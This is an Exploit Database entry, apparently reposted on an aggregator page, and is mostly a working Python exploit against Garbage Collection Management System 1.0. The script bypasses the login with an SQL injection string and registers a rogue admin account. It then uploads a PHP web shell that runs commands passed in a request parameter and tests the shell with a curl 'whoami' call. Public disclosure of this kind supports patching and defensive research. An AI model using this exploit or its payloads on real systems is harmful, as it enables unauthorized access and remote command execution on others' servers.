Garbage Collection Management System 1.0 – SQL Injection + Arbitrary File Upload

• Exploit Database
• 13 阅读

• 作者： Luca Bernardi
  日期： 2021-07-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50123/

• # Exploit Title: Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload
  # Date: 05-07-2021
  # Exploit Author: Luca Bernardi - bernardiluca.job at protonmail.com | luca.bernardi at dedagroup.it
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
  # POC: https://www.exploit-db.com/exploits/50085
  # Tested On: Ubuntu 21.04 + Apache/2.4.46 (Ubuntu)
  # Version: 1.0
  
  #======================================================
  
  #imports
  from requests_toolbelt.multipart.encoder import MultipartEncoder
  import requests
  import string
  import random
  import os
  import argparse
  
  #generate random string 8 chars
  def randomGen(size=8, chars=string.ascii_lowercase):
  	return ''.join(random.choice(chars) for _ in range(size))
  
  
  
  #generating a random username and a random web shell file
  user=randomGen()
  shellFile=randomGen()+".php"
  
  #creating a payload for the login
  payload = {
  "username":"a",
  "password":"a' OR 1=1 AND ucat='admin' #"
  }
  
  
  proxies = {"http":"http://127.0.0.1:8080"}
  
  session=requests.Session()
  
  #changeme
  urlBase="http://172.27.1.71/Gabage/"
  
  url=urlBase+"login.php"
  print("=== executing SQL Injection ===")
  req=session.post(url,payload,allow_redirects=False)
  
  cookie=req.headers["Set-Cookie"]
  print("=== authenticated admin cookie:" + cookie + " ===")
  
  url=urlBase+"apatient/users.php?user=rayat"
  
  mp_encoder = MultipartEncoder(
  fields = {
  "fullname":user,
  "ucat":"admin",
  "contact":"0000000000",
  "address":"aaa ave",
  "username":user,
  "acstatus":"active",
  "date":"2021-07-05",
  "password":user,
  "image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"),
  "submit":""
  }
  )
  
  
  headers = {
  "Cookie":cookie,
  'Content-Type': mp_encoder.content_type
  }
  
  print("=== creating user " + user + " and uploading shell " + shellFile +" ===")
  req=session.post(url,data=mp_encoder,allow_redirects=False,headers=headers) #,proxies=proxies)
  
  #curl the shell for test
  requestUrl = "curl " + urlBase + "apatient/contract/"+shellFile+"?cmd=whoami"
  print("=== issuing a whoami: " + requestUrl + " ===")
  
  print("===CURL OUTPUT===")
  os.system(requestUrl)